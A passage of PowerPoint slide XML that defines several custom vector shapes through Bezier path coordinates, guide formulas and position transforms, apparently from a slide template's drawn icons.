                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="138"/>
                    <a:pt x="32" y="138"/>
                    <a:pt x="32" y="138"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="138"/>
                    <a:pt x="28" y="139"/>
                    <a:pt x="26" y="138"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="136"/>
                    <a:pt x="23" y="133"/>
                    <a:pt x="22" y="136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12" y="140"/>
                    <a:pt x="12" y="140"/>
                    <a:pt x="12" y="140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9" y="145"/>
                    <a:pt x="5" y="151"/>
                    <a:pt x="5" y="1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ṡḻîḓe"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6182018" y="3355641"/>
              <a:ext cx="173144" cy="177234"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 14 w 54"/>
                <a:gd name="T1" fmla="*/ 0 h 55"/>
                <a:gd name="T2" fmla="*/ 2 w 54"/>
                <a:gd name="T3" fmla="*/ 9 h 55"/>
                <a:gd name="T4" fmla="*/ 11 w 54"/>
                <a:gd name="T5" fmla="*/ 20 h 55"/>
                <a:gd name="T6" fmla="*/ 19 w 54"/>
                <a:gd name="T7" fmla="*/ 32 h 55"/>
                <a:gd name="T8" fmla="*/ 22 w 54"/>
                <a:gd name="T9" fmla="*/ 40 h 55"/>
                <a:gd name="T10" fmla="*/ 26 w 54"/>
                <a:gd name="T11" fmla="*/ 47 h 55"/>
                <a:gd name="T12" fmla="*/ 26 w 54"/>
                <a:gd name="T13" fmla="*/ 50 h 55"/>
                <a:gd name="T14" fmla="*/ 30 w 54"/>
                <a:gd name="T15" fmla="*/ 53 h 55"/>
                <a:gd name="T16" fmla="*/ 39 w 54"/>
                <a:gd name="T17" fmla="*/ 55 h 55"/>
                <a:gd name="T18" fmla="*/ 40 w 54"/>
                <a:gd name="T19" fmla="*/ 55 h 55"/>
                <a:gd name="T20" fmla="*/ 48 w 54"/>
                <a:gd name="T21" fmla="*/ 20 h 55"/>
                <a:gd name="T22" fmla="*/ 42 w 54"/>
                <a:gd name="T23" fmla="*/ 13 h 55"/>
                <a:gd name="T24" fmla="*/ 34 w 54"/>
                <a:gd name="T25" fmla="*/ 8 h 55"/>
                <a:gd name="T26" fmla="*/ 26 w 54"/>
                <a:gd name="T27" fmla="*/ 3 h 55"/>
                <a:gd name="T28" fmla="*/ 16 w 54"/>
                <a:gd name="T29" fmla="*/ 0 h 55"/>
                <a:gd name="T30" fmla="*/ 14 w 54"/>
                <a:gd name="T3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" h="55">
                  <a:moveTo>
                    <a:pt x="14" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="0"/>
                    <a:pt x="4" y="3"/>
                    <a:pt x="2" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="21"/>
                    <a:pt x="6" y="15"/>
                    <a:pt x="11" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="23"/>
                    <a:pt x="18" y="27"/>
                    <a:pt x="19" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="35"/>
                    <a:pt x="22" y="35"/>
                    <a:pt x="22" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="44"/>
                    <a:pt x="23" y="45"/>
                    <a:pt x="26" y="47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53" y="55"/>
                    <a:pt x="54" y="25"/>
                    <a:pt x="48" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="18"/>
                    <a:pt x="45" y="16"/>
                    <a:pt x="42" y="13"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="13"/>
                    <a:pt x="35" y="8"/>
                    <a:pt x="34" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="4"/>
                    <a:pt x="35" y="6"/>
                    <a:pt x="26" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="3"/>
                    <a:pt x="21" y="0"/>
                    <a:pt x="16" y="0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ṩḻïḍe"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6565117" y="2986176"/>
              <a:ext cx="422636" cy="546700"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 47 w 131"/>
                <a:gd name="T1" fmla="*/ 118 h 169"/>
                <a:gd name="T2" fmla="*/ 59 w 131"/>
                <a:gd name="T3" fmla="*/ 46 h 169"/>
                <a:gd name="T4" fmla="*/ 91 w 131"/>
                <a:gd name="T5" fmla="*/ 15 h 169"/>
                <a:gd name="T6" fmla="*/ 77 w 131"/>
                <a:gd name="T7" fmla="*/ 0 h 169"/>
                <a:gd name="T8" fmla="*/ 60 w 131"/>
                <a:gd name="T9" fmla="*/ 4 h 169"/>
                <a:gd name="T10" fmla="*/ 47 w 131"/>
                <a:gd name="T11" fmla="*/ 8 h 169"/>
                <a:gd name="T12" fmla="*/ 29 w 131"/>
                <a:gd name="T13" fmla="*/ 24 h 169"/>
                <a:gd name="T14" fmla="*/ 48 w 131"/>
                <a:gd name="T15" fmla="*/ 29 h 169"/>
                <a:gd name="T16" fmla="*/ 58 w 131"/>
                <a:gd name="T17" fmla="*/ 28 h 169"/>
                <a:gd name="T18" fmla="*/ 29 w 131"/>
                <a:gd name="T19" fmla="*/ 36 h 169"/>
                <a:gd name="T20" fmla="*/ 7 w 131"/>
                <a:gd name="T21" fmla="*/ 77 h 169"/>
                <a:gd name="T22" fmla="*/ 1 w 131"/>
                <a:gd name="T23" fmla="*/ 150 h 169"/>
                <a:gd name="T24" fmla="*/ 20 w 131"/>
                <a:gd name="T25" fmla="*/ 163 h 169"/>
                <a:gd name="T26" fmla="*/ 47 w 131"/>
                <a:gd name="T27" fmla="*/ 140 h 169"/>
                <a:gd name="T28" fmla="*/ 66 w 131"/>
                <a:gd name="T29" fmla="*/ 109 h 169"/>
                <a:gd name="T30" fmla="*/ 97 w 131"/>
                <a:gd name="T31" fmla="*/ 160 h 169"/>
                <a:gd name="T32" fmla="*/ 117 w 131"/>
                <a:gd name="T33" fmla="*/ 169 h 169"/>
                <a:gd name="T34" fmla="*/ 125 w 131"/>
                <a:gd name="T35" fmla="*/ 150 h 169"/>
                <a:gd name="T36" fmla="*/ 131 w 131"/>
                <a:gd name="T37" fmla="*/ 138 h 169"/>
                <a:gd name="T38" fmla="*/ 118 w 131"/>
                <a:gd name="T39" fmla="*/ 145 h 169"/>
                <a:gd name="T40" fmla="*/ 99 w 131"/>
                <a:gd name="T41" fmla="*/ 130 h 169"/>
                <a:gd name="T42" fmla="*/ 81 w 131"/>
                <a:gd name="T43" fmla="*/ 98 h 169"/>
                <a:gd name="T44" fmla="*/ 88 w 131"/>
                <a:gd name="T45" fmla="*/ 67 h 169"/>
                <a:gd name="T46" fmla="*/ 66 w 131"/>
                <a:gd name="T47" fmla="*/ 57 h 169"/>
                <a:gd name="T48" fmla="*/ 52 w 131"/>
                <a:gd name="T49" fmla="*/ 65 h 169"/>
                <a:gd name="T50" fmla="*/ 55 w 131"/>
                <a:gd name="T51" fmla="*/ 73 h 169"/>
                <a:gd name="T52" fmla="*/ 51 w 131"/>
                <a:gd name="T53" fmla="*/ 84 h 169"/>
                <a:gd name="T54" fmla="*/ 43 w 131"/>
                <a:gd name="T55" fmla="*/ 96 h 169"/>
                <a:gd name="T56" fmla="*/ 53 w 131"/>
                <a:gd name="T57" fmla="*/ 97 h 169"/>
                <a:gd name="T58" fmla="*/ 56 w 131"/>
                <a:gd name="T59" fmla="*/ 101 h 169"/>
                <a:gd name="T60" fmla="*/ 51 w 131"/>
                <a:gd name="T61" fmla="*/ 110 h 169"/>
                <a:gd name="T62" fmla="*/ 31 w 131"/>
                <a:gd name="T63" fmla="*/ 142 h 169"/>
                <a:gd name="T64" fmla="*/ 23 w 131"/>
                <a:gd name="T65" fmla="*/ 119 h 169"/>
                <a:gd name="T66" fmla="*/ 33 w 131"/>
                <a:gd name="T67" fmla="*/ 71 h 169"/>
                <a:gd name="T68" fmla="*/ 43 w 131"/>
                <a:gd name="T69" fmla="*/ 51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1" h="169">
                  <a:moveTo>
                    <a:pt x="47" y="118"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="134"/>
                    <a:pt x="47" y="108"/>
                    <a:pt x="47" y="118"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="43" y="51"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="49"/>
                    <a:pt x="54" y="47"/>
                    <a:pt x="59" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="43"/>
                    <a:pt x="66" y="40"/>
                    <a:pt x="70" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="31"/>
                    <a:pt x="91" y="26"/>
                    <a:pt x="91" y="15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91" y="5"/>
                    <a:pt x="83" y="0"/>
                    <a:pt x="77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7" y="0"/>
                    <a:pt x="67" y="3"/>
                    <a:pt x="60" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="4"/>
                    <a:pt x="57" y="5"/>
                    <a:pt x="54" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="52" y="7"/>
                    <a:pt x="49" y="7"/>
                    <a:pt x="47" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="9"/>
                    <a:pt x="39" y="12"/>
                    <a:pt x="36" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="16"/>
                    <a:pt x="29" y="20"/>
                    <a:pt x="29" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="30"/>
                    <a:pt x="37" y="33"/>
                    <a:pt x="41" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="32"/>
                    <a:pt x="47" y="31"/>
                    <a:pt x="48" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="52" y="26"/>
                    <a:pt x="51" y="28"/>
                    <a:pt x="55" y="26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3" y="37"/>
                    <a:pt x="41" y="39"/>
                    <a:pt x="40" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="44"/>
                    <a:pt x="34" y="36"/>
                    <a:pt x="29" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="36"/>
                    <a:pt x="18" y="40"/>
                    <a:pt x="15" y="43"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="50"/>
                    <a:pt x="7" y="65"/>
                    <a:pt x="7" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="85"/>
                    <a:pt x="0" y="126"/>
                    <a:pt x="0" y="14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6" y="160"/>
                    <a:pt x="6" y="160"/>
                    <a:pt x="6" y="160"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="160"/>
                    <a:pt x="15" y="163"/>
                    <a:pt x="20" y="163"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="163"/>
                    <a:pt x="21" y="163"/>
                    <a:pt x="21" y="163"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="163"/>
                    <a:pt x="42" y="148"/>
                    <a:pt x="47" y="140"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="127"/>
                    <a:pt x="58" y="124"/>
                    <a:pt x="62" y="107"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="109"/>
                    <a:pt x="66" y="109"/>
                    <a:pt x="66" y="109"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="116"/>
                    <a:pt x="68" y="123"/>
                    <a:pt x="70" y="129"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="138"/>
                    <a:pt x="89" y="154"/>
                    <a:pt x="97" y="160"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100" y="163"/>
                    <a:pt x="109" y="169"/>
                    <a:pt x="114" y="169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="117" y="169"/>
                    <a:pt x="117" y="169"/>
                    <a:pt x="117" y="169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="169"/>
                    <a:pt x="122" y="167"/>
                    <a:pt x="123" y="166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="159"/>
                    <a:pt x="123" y="155"/>
                    <a:pt x="125" y="150"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="148"/>
                    <a:pt x="126" y="147"/>
                    <a:pt x="127" y="144"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="140"/>
                    <a:pt x="131" y="140"/>
                    <a:pt x="131" y="138"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="137"/>
                    <a:pt x="127" y="133"/>
                    <a:pt x="125" y="132"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="122" y="134"/>
                    <a:pt x="118" y="140"/>
                    <a:pt x="118" y="145"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="145"/>
                    <a:pt x="115" y="145"/>
                    <a:pt x="115" y="145"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="111" y="145"/>
                    <a:pt x="102" y="133"/>
                    <a:pt x="99" y="130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="96" y="127"/>
                    <a:pt x="94" y="123"/>
                    <a:pt x="92" y="120"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="89" y="117"/>
                    <a:pt x="81" y="102"/>
                    <a:pt x="81" y="98"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="88"/>
                    <a:pt x="95" y="78"/>
                    <a:pt x="95" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="95" y="70"/>
                    <a:pt x="90" y="67"/>
                    <a:pt x="88" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="67"/>
                    <a:pt x="78" y="71"/>
                    <a:pt x="76" y="72"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="66"/>
                    <a:pt x="76" y="57"/>
                    <a:pt x="66" y="57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58" y="57"/>
                    <a:pt x="52" y="60"/>
                    <a:pt x="52" y="65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52" y="72"/>
                    <a:pt x="55" y="70"/>
                    <a:pt x="55" y="73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2" y="80"/>
                    <a:pt x="51" y="81"/>
                    <a:pt x="51" y="84"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="85"/>
                    <a:pt x="43" y="90"/>
                    <a:pt x="43" y="95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98"/>
                    <a:pt x="45" y="98"/>
                    <a:pt x="47" y="99"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="98"/>
                    <a:pt x="50" y="97"/>
                    <a:pt x="53" y="97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6" y="97"/>
                    <a:pt x="56" y="99"/>
                    <a:pt x="56" y="101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56" y="106"/>
                    <a:pt x="54" y="108"/>
                    <a:pt x="51" y="110"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="113"/>
                    <a:pt x="38" y="130"/>
                    <a:pt x="36" y="135"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="137"/>
                    <a:pt x="34" y="142"/>
                    <a:pt x="31" y="142"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="142"/>
                    <a:pt x="29" y="142"/>
                    <a:pt x="29" y="142"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="142"/>
                    <a:pt x="23" y="125"/>
                    <a:pt x="23" y="119"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="110"/>
                    <a:pt x="25" y="100"/>
                    <a:pt x="27" y="93"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="86"/>
                    <a:pt x="30" y="77"/>
                    <a:pt x="33" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="65"/>
                    <a:pt x="38" y="56"/>
                    <a:pt x="39" y="49"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="43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ŝlïḑé"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5868450" y="2928915"/>
              <a:ext cx="500346" cy="617594"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 111 w 155"/>
                <a:gd name="T1" fmla="*/ 63 h 191"/>
                <a:gd name="T2" fmla="*/ 107 w 155"/>
                <a:gd name="T3" fmla="*/ 77 h 191"/>
                <a:gd name="T4" fmla="*/ 105 w 155"/>
                <a:gd name="T5" fmla="*/ 71 h 191"/>
                <a:gd name="T6" fmla="*/ 130 w 155"/>
                <a:gd name="T7" fmla="*/ 41 h 191"/>
                <a:gd name="T8" fmla="*/ 106 w 155"/>
                <a:gd name="T9" fmla="*/ 28 h 191"/>
                <a:gd name="T10" fmla="*/ 98 w 155"/>
                <a:gd name="T11" fmla="*/ 3 h 191"/>
                <a:gd name="T12" fmla="*/ 83 w 155"/>
                <a:gd name="T13" fmla="*/ 6 h 191"/>
                <a:gd name="T14" fmla="*/ 86 w 155"/>
                <a:gd name="T15" fmla="*/ 44 h 191"/>
                <a:gd name="T16" fmla="*/ 69 w 155"/>
                <a:gd name="T17" fmla="*/ 58 h 191"/>
                <a:gd name="T18" fmla="*/ 77 w 155"/>
                <a:gd name="T19" fmla="*/ 70 h 191"/>
                <a:gd name="T20" fmla="*/ 87 w 155"/>
                <a:gd name="T21" fmla="*/ 73 h 191"/>
                <a:gd name="T22" fmla="*/ 82 w 155"/>
                <a:gd name="T23" fmla="*/ 105 h 191"/>
                <a:gd name="T24" fmla="*/ 71 w 155"/>
                <a:gd name="T25" fmla="*/ 110 h 191"/>
                <a:gd name="T26" fmla="*/ 66 w 155"/>
                <a:gd name="T27" fmla="*/ 96 h 191"/>
                <a:gd name="T28" fmla="*/ 65 w 155"/>
                <a:gd name="T29" fmla="*/ 63 h 191"/>
                <a:gd name="T30" fmla="*/ 49 w 155"/>
                <a:gd name="T31" fmla="*/ 55 h 191"/>
                <a:gd name="T32" fmla="*/ 44 w 155"/>
                <a:gd name="T33" fmla="*/ 89 h 191"/>
                <a:gd name="T34" fmla="*/ 33 w 155"/>
                <a:gd name="T35" fmla="*/ 118 h 191"/>
                <a:gd name="T36" fmla="*/ 15 w 155"/>
                <a:gd name="T37" fmla="*/ 128 h 191"/>
                <a:gd name="T38" fmla="*/ 0 w 155"/>
                <a:gd name="T39" fmla="*/ 141 h 191"/>
                <a:gd name="T40" fmla="*/ 4 w 155"/>
                <a:gd name="T41" fmla="*/ 149 h 191"/>
                <a:gd name="T42" fmla="*/ 66 w 155"/>
                <a:gd name="T43" fmla="*/ 129 h 191"/>
                <a:gd name="T44" fmla="*/ 72 w 155"/>
                <a:gd name="T45" fmla="*/ 132 h 191"/>
                <a:gd name="T46" fmla="*/ 56 w 155"/>
                <a:gd name="T47" fmla="*/ 151 h 191"/>
                <a:gd name="T48" fmla="*/ 15 w 155"/>
                <a:gd name="T49" fmla="*/ 184 h 191"/>
                <a:gd name="T50" fmla="*/ 13 w 155"/>
                <a:gd name="T51" fmla="*/ 191 h 191"/>
                <a:gd name="T52" fmla="*/ 26 w 155"/>
                <a:gd name="T53" fmla="*/ 187 h 191"/>
                <a:gd name="T54" fmla="*/ 52 w 155"/>
                <a:gd name="T55" fmla="*/ 177 h 191"/>
                <a:gd name="T56" fmla="*/ 140 w 155"/>
                <a:gd name="T57" fmla="*/ 119 h 191"/>
                <a:gd name="T58" fmla="*/ 151 w 155"/>
                <a:gd name="T59" fmla="*/ 103 h 191"/>
                <a:gd name="T60" fmla="*/ 140 w 155"/>
                <a:gd name="T61" fmla="*/ 99 h 191"/>
                <a:gd name="T62" fmla="*/ 107 w 155"/>
                <a:gd name="T63" fmla="*/ 104 h 191"/>
                <a:gd name="T64" fmla="*/ 114 w 155"/>
                <a:gd name="T65" fmla="*/ 90 h 191"/>
                <a:gd name="T66" fmla="*/ 140 w 155"/>
                <a:gd name="T67" fmla="*/ 5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5" h="191">
                  <a:moveTo>
                    <a:pt x="105" y="71"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="67"/>
                    <a:pt x="108" y="63"/>
                    <a:pt x="111" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="114" y="63"/>
                    <a:pt x="116" y="65"/>
                    <a:pt x="116" y="68"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="116" y="73"/>
                    <a:pt x="112" y="77"/>
                    <a:pt x="107" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="77"/>
                    <a:pt x="105" y="75"/>
                    <a:pt x="105" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="71"/>
                    <a:pt x="105" y="71"/>
                    <a:pt x="105" y="71"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="140" y="55"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="140" y="47"/>
                    <a:pt x="133" y="45"/>
                    <a:pt x="130" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="41"/>
                    <a:pt x="117" y="41"/>
                    <a:pt x="111" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="40"/>
                    <a:pt x="106" y="34"/>
                    <a:pt x="106" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="24"/>
                    <a:pt x="107" y="9"/>
                    <a:pt x="106" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="4"/>
                    <a:pt x="102" y="3"/>
                    <a:pt x="98" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="2"/>
                    <a:pt x="90" y="0"/>
                    <a:pt x="89" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="88" y="0"/>
                    <a:pt x="84" y="5"/>
                    <a:pt x="83" y="6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6" y="47"/>
                    <a:pt x="79" y="48"/>
                    <a:pt x="76" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="51"/>
                    <a:pt x="69" y="56"/>
                    <a:pt x="69" y="58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9" y="62"/>
                    <a:pt x="73" y="70"/>
                    <a:pt x="77" y="70"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="79" y="70"/>
                    <a:pt x="80" y="69"/>
                    <a:pt x="81" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="84" y="69"/>
                    <a:pt x="87" y="70"/>
                    <a:pt x="87" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="76"/>
                    <a:pt x="86" y="87"/>
                    <a:pt x="85" y="90"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="84" y="95"/>
                    <a:pt x="82" y="98"/>
                    <a:pt x="82" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="79" y="107"/>
                    <a:pt x="77" y="110"/>
                    <a:pt x="74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67" y="107"/>
                    <a:pt x="67" y="105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6" y="76"/>
                    <a:pt x="68" y="68"/>
                    <a:pt x="65" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="61"/>
                    <a:pt x="56" y="55"/>
                    <a:pt x="53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6" y="55"/>
                    <a:pt x="42" y="58"/>
                    <a:pt x="42" y="61"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="73"/>
                    <a:pt x="42" y="80"/>
                    <a:pt x="44" y="89"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="93"/>
                    <a:pt x="46" y="112"/>
                    <a:pt x="46" y="117"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="118"/>
                    <a:pt x="33" y="118"/>
                    <a:pt x="33" y="118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4" y="121"/>
                    <a:pt x="17" y="124"/>
                    <a:pt x="15" y="128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="128"/>
                    <a:pt x="9" y="129"/>
                    <a:pt x="8" y="132"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="132"/>
                    <a:pt x="0" y="136"/>
                    <a:pt x="0" y="141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47"/>
                    <a:pt x="3" y="145"/>
                    <a:pt x="4" y="149"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="149"/>
                    <a:pt x="9" y="150"/>
                    <a:pt x="12" y="150"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="150"/>
                    <a:pt x="48" y="129"/>
                    <a:pt x="66" y="129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70" y="129"/>
                    <a:pt x="71" y="130"/>
                    <a:pt x="72" y="132"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="136"/>
                    <a:pt x="65" y="142"/>
                    <a:pt x="62" y="145"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="148"/>
                    <a:pt x="58" y="148"/>
                    <a:pt x="56" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="156"/>
                    <a:pt x="20" y="172"/>
                    <a:pt x="18" y="180"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="180"/>
                    <a:pt x="15" y="181"/>
                    <a:pt x="15" y="184"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="187"/>
                    <a:pt x="11" y="187"/>
                    <a:pt x="11" y="187"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="191"/>
                    <a:pt x="13" y="191"/>
                    <a:pt x="13" y="191"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="191"/>
                    <a:pt x="16" y="191"/>
                    <a:pt x="16" y="191"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="191"/>
                    <a:pt x="23" y="189"/>
                    <a:pt x="26" y="187"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="186"/>
                    <a:pt x="33" y="186"/>
                    <a:pt x="36" y="185"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="184"/>
                    <a:pt x="49" y="180"/>
                    <a:pt x="52" y="177"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="169"/>
                    <a:pt x="70" y="163"/>
                    <a:pt x="76" y="152"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="114"/>
                    <a:pt x="81" y="119"/>
                    <a:pt x="140" y="119"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="119"/>
                    <a:pt x="153" y="115"/>
                    <a:pt x="155" y="110"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="155" y="106"/>
                    <a:pt x="153" y="104"/>
                    <a:pt x="151" y="103"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="148" y="102"/>
                    <a:pt x="145" y="99"/>
                    <a:pt x="143" y="99"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="140" y="99"/>
                    <a:pt x="140" y="99"/>
                    <a:pt x="140" y="99"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="99"/>
                    <a:pt x="124" y="104"/>
                    <a:pt x="114" y="104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="104"/>
                    <a:pt x="107" y="104"/>
                    <a:pt x="107" y="104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="104"/>
                    <a:pt x="103" y="102"/>
                    <a:pt x="102" y="99"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="95"/>
                    <a:pt x="110" y="93"/>
                    <a:pt x="114" y="90"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="86"/>
                    <a:pt x="121" y="84"/>
                    <a:pt x="125" y="81"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
